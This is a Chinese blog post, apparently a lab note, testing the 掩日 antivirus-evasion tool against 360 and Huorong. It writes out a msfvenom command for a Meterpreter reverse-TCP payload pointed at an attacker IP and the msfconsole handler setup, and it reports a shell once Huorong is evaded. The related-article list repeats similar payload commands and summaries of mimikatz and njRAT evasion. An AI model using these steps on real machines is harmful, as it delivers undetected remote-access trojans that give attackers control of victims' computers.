掩日免杀笔记

最新推荐文章于 2024-06-07 09:41:39 发布
最新推荐文章于 2024-06-07 09:41:39 发布
阅读量4.4k 收藏 17
点赞数 1
分类专栏: 免杀和bypass 文章标签: 安全 免杀 渗透测试 火绒免杀 远控
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/117454490
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

 

 

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

 

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

 

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

 

 

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

 

下载地址:

https://github.com/1y0n/av_evasion_tool/

 

将文件直接拖过来就行了

 

 

最后会生成一个YR_1.exe文件

 

 

将这两个文件分别压缩备份,发送到window10和window7上

 

 

3. 静态测试

打开各自的杀软进行测试

3.1 360

 

均报毒

3.2 火绒

 

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

 


msfconsole



use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

 

 

4.2 360下

4.2.1 1..exe

直接gg

 

4.2.2 免杀版1.exe

直接gg

4.3 火绒

4.3.1. 1.exe

gg

4.3.2 免杀版1.exe

上线正常

执行命令

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!👍

乌鸦安全
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
FourEye 免杀
战神/calmness的博客
12-25 736
生成木马 root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.raw msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > se..
网络安全进阶篇之免杀(十四章-8)使用掩日配合CS免杀360
划水的小白白
05-30 1014
文章目录一、 概念1.1 360 安全卫士和 360 杀毒二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 免杀过3603.3 免杀火绒 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二
新版掩日免杀——搭配CS使用测试
ZxC789456302的博客
10-05 1727
使用工具:掩日免杀 环境需求: 64位 Windows 7 或以上操作系统 .net framework 4.5 或更高
掩日:红队行动中的综合免杀利器
最新发布
gitblog_00068的博客
06-07 412
掩日:红队行动中的综合免杀利器 项目地址:https://gitcode.com/1y0n/AV_Evasion_Tool 在网络安全的世界里,对抗是永不停息的主题。当红队执行任务时,如何确保渗透工具逃避杀毒软件的监控,成为了至关重要的一环。这就是掩日——一个专为红队设计的综合免杀工具,它的存在就是为了提供强大的隐蔽性,让你的行动更加悄无声息。 项目介绍 掩日是一款高效且灵活的免杀工具,由xre...
【新版】掩日免杀windows Defender
crowsec
06-05 6163
掩日免杀是一个非常优秀的项目,目前在`4月19`号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
免杀手法 免杀笔记 免杀技巧
07-15
免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧
免杀工具 做免杀必备
05-10
免杀工具,全称为“免检测工具”,是黑客或安全研究人员用来逃避反病毒软件检测的软件。在网络安全领域,免杀技术是恶意软件开发者用来确保其恶意代码能在目标系统上运行而不被反病毒软件发现的重要手段。免杀工具...
星载多模式差分吸收高光谱成像仪光学设计
02-07
星载多模式差分吸收高光谱成像仪是一种新型空间大气探测仪器,要求同时具有天底、临边和掩日等多模式探测功能,主要用于二氧化硫、二氧化氮等大气痕量气体探测。提出了利用两个扫描镜切换不同探测模式、利用双光谱仪...
weishidong:weishidong.com
03-13
5. "荧惑守心掩日以观天象" - 这句话看起来像是引用或者某种隐喻,可能作为网站设计的一种艺术性表达,或者与网站的主题或个性有关。 6. "寸则王之寸尺亦王之尺" - 这也可能是哲学或文化引用,可能与网站的排版设计...
Foureye实现免杀
reaido的博客
01-29 592
一、项目地址 https://github.com/lengjibo/FourEye 推荐挂代理 二、相关命令 git clone https://github.com/lengjibo/FourEye.git cd FourEye pip install -r requirements.txt 三、msfvenom生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f raw -o
强大的免杀工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
免杀神器thefatrat
01-06
linux下使用(用linux下太慢了!!!)教程请自行百度
mimikatz免杀过360和火绒
qq_44905657的博客
12-28 2077
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
shellCode免杀技巧
qq_39330735的博客
05-15 2302
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2877
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
免杀工具 -- FourEye
weixin_41489908的博客
01-12 6867
今天有一点想你,其实,不止一点,其实,不止今天。。。 ​----网易云热评 一、简介 快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装 1、下载到本地 git clonehttps://github.com/lengjibo/FourEye.git 2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 Byp...
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1494
1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
shellcode不是一段16进制的机器码吗?你为啥说能直接执行呢?应该是需要先编译成二进制可执行文件吧?msf生成的shellcode为什么要区分输出格式?掩日免杀是c格式的shellcode的生成器吗?如果换了一个格式的shellcode,掩日免杀还能正常工作吗?
04-29
你说得没错,shellcode是一段16进制的机器码,需要先编译成可执行文件才能运行。但是在实际的攻击中,攻击者通常会将shellcode注入到漏洞处,然后通过控制程序流程将其直接执行,而不需要将其编译成可执行文件。 msf生成的shellcode区分输出格式,是因为不同的载荷需要不同的格式来生成shellcode。例如,如果是用于缓冲区溢出的payload,通常需要生成C语言格式的shellcode,而如果是用于注入到远程进程中的payload,通常需要生成raw格式的shellcode。 掩日免杀是一个c格式的shellcode生成器,可以生成多种不同格式的shellcode。如果换了一个格式的shellcode,掩日免杀可能无法正常工作,需要进行相应的修改。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值